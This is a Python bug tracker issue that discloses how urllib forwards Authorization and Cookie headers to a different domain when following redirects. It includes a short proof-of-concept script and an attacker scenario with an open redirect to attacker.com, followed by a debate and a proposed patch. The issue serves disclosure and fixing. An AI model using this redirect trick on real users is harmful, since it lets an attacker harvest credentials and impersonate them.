classification
Title: urllib may leak sensitive HTTP headers to a third-party web site
Type: security Stage: patch review
Components: Library (Lib) Versions: Python 3.5
process
Status: open Resolution:
Dependencies: Superseder:
Assigned To: Nosy List: Ivan.Pozdeev, alex, artem.smotrakov, eamanu, jwilk, kyoshidajp, martin.panter, orsenthil, xtreak
Priority: normal Keywords: patch

Created on 2018-05-27 14:20 by artem.smotrakov, last changed 2018-12-29 15:02 by kyoshidajp.

Pull Requests
URL Status Linked Edit
PR 11292 open kyoshidajp, 2018-12-23 02:03
Messages (10)
msg317793 - (view) Author: Artem Smotrakov (artem.smotrakov) * Date: 2018-05-27 14:20
After discussing it on security@python.org, it was decided to disclose it. Here is the original report:




Hello Python Security Team,

Looks like urllib may leak sensitive HTTP headers to third parties when handling redirects.

Let's consider the following environment:
- http://httpleak.gypsyengineer.com/index.php asks a user to authenticate via basic HTTP authentication scheme
- http://httpleak.gypsyengineer.com/redirect.php?url=<url> is an open redirect which returns 301 code, and redirects a client to the specified URL
- http://headers.gypsyengineer.com just prints out all HTTP headers which a web browser sent

Let's then consider the following scenario:
- create an instance of urllib.request.Request to open 'http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com'
- call urllib.request.Request.add_header() method to set Authorization and Cookie headers
- call urllib.request.urlopen() method to open a connection

Here is what happens next:
- urllib sends the HTTP authentication header to httpleak.gypsyengineer.com as expected
- redirect.php returns 301 code which redirects to headers.gypsyengineer.com (note that httpleak.gypsyengineer.com and headers.gypsyengineer.com are different domains)
- urllib processes 301 code and makes a request to http://headers.gypsyengineer.com

The problem is that urllib sends the Authorization and Cookie headers headers to http://headers.gypsyengineer.com as well.

Let's imagine that a user is authenticated on a web site via one of HTTP authentication schemes (basic, digest, NTLM, SPNEGO/Kerberos), 
and the web site has an open redirect like http://httpleak.gypsyengineer.com/redirect.php
If an attacker can trick the user to open http://httpleak.gypsyengineer.com/redirect.php?url=http://attacker.com, 
then urllib is going to send sensitive headers to http://attacker.com where the attacker can gather them. 
As a result, the attacker can imporsonate the user on the original web site.

Here is a simple POC which shows the problem:

import urllib.request
req = urllib.request.Request('http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com')
req.add_header('Authorization', 'Basic YWRtaW46dGVzdA==')
req.add_header('Cookie', 'This is only for httpleak.gypsyengineer.com');
with urllib.request.urlopen(req) as f:
  print(f.read(2048).decode("utf-8"))


Running this code results to loading http://headers.gypsyengineer.com which prints out Authorization and Cookie headers 
which are supposed to be sent only to httpleak.gypsyengineer.com:

Hello, I am <b>headers.gypsyengineer.com</b></br></br>
Here are HTTP headers you just sent me:</br></br>
Accept-Encoding: identity</br>
User-Agent: Python-urllib/3.8</br>
<b>Authorization: Basic YWRtaW46dGVzdA==</br></b>
<b>Cookie: This is only for httpleak.gypsyengineer.com</br></b>
Host: headers.gypsyengineer.com</br>
Cache-Control: max-age=259200</br>
Connection: keep-alive</br>


I could reproduce it with 3.5.2, and latest build of https://github.com/python/cpython

If I am not missing something, it would be better if urllib filtered out sensitive HTTP headers while handling redirects.

Please let me know if I wrote anything dumb and stupid, or if you have any questions :) Thanks!

Artem
msg317818 - (view) Author: Ivan Pozdeev (Ivan.Pozdeev) * Date: 2018-05-28 00:11
According to https://stackoverflow.com/questions/1969709/how-to-forward-headers-on-http-redirect , there's nothing in the specs that mention (even the possibility) of any special request header processing.

According to https://tools.ietf.org/html/rfc7231#section-6.4 , redirection targets are to be treated as effectively equal to the original URL.

So, there aren't any grounds for the proposed filtering from web standards' POV.


Neither are there from security POV:
once you have given your credentials to a server, it is free to do whatever it wants with them. So, by giving them, you have effectively put down your signature that you trust the server with your data -- which implies trusting its advice where to resend it.
The server could as well do that resending itself and passed you the end result. So, your proposed filtering does not actually achieve anything meaningful.1
msg317824 - (view) Author: Artem Smotrakov (artem.smotrakov) * Date: 2018-05-28 06:28
Hi Ivan,

Yes, unfortunately specs don't say anything about this scenario.

> once you have given your credentials to a server, it is free to do whatever it wants with them. 

I hope servers don't share this opinion :)

> So, your proposed filtering does not actually achieve anything meaningful.1

I am sorry that I couldn't convice you. Thank you for your reply!
msg318453 - (view) Author: Ivan Pozdeev (Ivan.Pozdeev) * Date: 2018-06-01 18:52
It's not about "convincing" me or anyone else. It's about showing how this will be a strict improvement.

I showed that the HTTP RFC allows apps to rely on the fact that they are receiving all the headers. So filtering them arbitrarily violates the HTTP standard -- while the whole purpose of `urllib` is to conform to it (or it would not be able to reliably talk to HTTP servers).

So, your suggestion is a disaster rather than improvement.
msg319880 - (view) Author: Artem Smotrakov (artem.smotrakov) * Date: 2018-06-18 13:04
If I am not missing something, section 6.4 of RFC 7231 doesn't explicitly discuss that all headers should be sent. I wish it did :)

I think that an Authorization header for host A may make sense for host B if both A and B use the same database with user credentials. I am not sure that modern authentication mechanisms like OAuth rely on this fact (although I need to check the specs to make sure).

Sending a Cookie header to a different domain looks like a violation of the same-origin policy to me. RFC 6265 says something about it

https://tools.ietf.org/html/rfc6265#section-5.4

curl was recently updated to filter out Authorization headers in case of a redirect to another host. Chrome and Firefox don't sent either Authorization or Cookie headers while handling a redirect. It doesn't seem to be a disaster for them :)
msg332381 - (view) Author: Katsuhiko YOSHIDA (kyoshidajp) * Date: 2018-12-23 02:03
Hi,

I agree with this suggestion.

First, section 6.4. "Redirection 3xx" of RFC 7231 doesn't explicitly explain whether to send all headers (including Authorization).

I have confirmed that some third-party-library, tool, Programing Language and web browser did NOT forward the Authorization header at redirect.

- urllib3 (after 1.23, PR: https://github.com/urllib3/urllib3/pull/1346)
- curl (after 7.58.0, ref: https://curl.haxx.se/docs/CVE-2018-1000007.html)
- net/http package of Golang (ref: https://github.com/golang/go/blob/release-branch.go1.11/src/net/http/client.go#L41-L46)
- Safari Version 12.0.2 (13606.3.4.1.4)
- Google Chrome Version 71.0.3578.98 (Official Build) (64-bit)

In other words, these are being on the safe side.

Actually, HTTPBasicAuthHandler of urllib2 doesn't forward the Authorization header at redirect. If this suggestion is rejected, I think that it should be changed.
msg332408 - (view) Author: Emmanuel Arias (eamanu) * Date: 2018-12-24 05:30
Hi!, 

Like say Katsuhiko YOSHIDA (https://github.com/python/cpython/pull/11292#issuecomment-449667371) this should be filter other sensitive header. I think that is reasonable if we think on a complete solution to this issue. 

Maybe this issue could be apply on 3.5+ version?
msg332561 - (view) Author: Martin Panter (martin.panter) * (Python committer) Date: 2018-12-26 20:45
Are you aware of the “add_unredirected_header” method? Maybe that is enough to avoid your problem.
https://docs.python.org/dev/library/urllib.request.html#urllib.request.Request.add_unredirected_header
msg332571 - (view) Author: Katsuhiko YOSHIDA (kyoshidajp) * Date: 2018-12-27 00:56
Thanks. But I think the “add_unredirected_header” is not enough.

These sensitive headers should be removed only when redirecting to cross-site automatically for security like HTTPBasicAuthHandler of urllib2. In order to fulfill this requirement, I think the operation should be in HTTPRedirectHandler.redirect_request.
msg332719 - (view) Author: Katsuhiko YOSHIDA (kyoshidajp) * Date: 2018-12-29 15:02
According to RFC7235 (https://tools.ietf.org/html/rfc7235#section-4.1), WWW-Authenticate header is sent from server to client. And it has not credential data. 

Also, Cookie2 header is already obsoleted by RFC6295 (https://tools.ietf.org/html/rfc6265).

So, I think that both "Authorization" and "Cookie" are enough.
History
Date User Action Args
2018-12-29 15:02:19kyoshidajpsetmessages: + msg332719
2018-12-27 00:56:30kyoshidajpsetmessages: + msg332571
2018-12-26 20:45:20martin.pantersetnosy: + martin.panter

messages: + msg332561
title: urllib may leak sensitive HTTP headers to a third-party web site1111 -> urllib may leak sensitive HTTP headers to a third-party web site
2018-12-25 06:00:42shuozsettitle: urllib may leak sensitive HTTP headers to a third-party web site -> urllib may leak sensitive HTTP headers to a third-party web site1111
2018-12-24 05:30:27eamanusetnosy: + eamanu
messages: + msg332408
2018-12-23 05:39:34xtreaksetnosy: + xtreak
2018-12-23 02:03:56kyoshidajpsetnosy: + kyoshidajp
messages: + msg332381
pull_requests: + pull_request10522

keywords: + patch
stage: patch review
2018-06-18 13:04:05artem.smotrakovsetmessages: + msg319880
2018-06-01 18:52:51Ivan.Pozdeevsetmessages: + msg318453
2018-06-01 17:03:44jwilksetnosy: + jwilk
2018-05-28 06:28:26artem.smotrakovsetmessages: + msg317824
2018-05-28 00:11:20Ivan.Pozdeevsetnosy: + Ivan.Pozdeev
messages: + msg317818
2018-05-27 14:21:00alexsetnosy: + orsenthil
2018-05-27 14:20:06artem.smotrakovcreate